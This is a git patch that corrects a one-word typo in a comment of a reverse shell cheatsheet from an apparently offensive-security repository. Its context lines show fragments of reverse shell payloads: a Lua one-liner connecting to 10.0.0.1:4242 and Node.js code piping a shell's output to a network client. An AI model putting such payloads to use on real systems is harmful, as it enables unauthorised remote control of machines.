From bb6c9ed172c673451edef9fde5c0ca8a4ca9d32e Mon Sep 17 00:00:00 2001 From: Spidycodes <40536205+spidyhackx@users.noreply.github.com> Date: Tue, 2 Aug 2022 21:48:07 +0000 Subject: [PATCH] typo --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index e1da152..01355b3 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") sh.stdout.pipe(client); sh.stderr.pipe(client); }); - return /a/; // Prevents the Node.js application form crashing + return /a/; // Prevents the Node.js application from crashing })();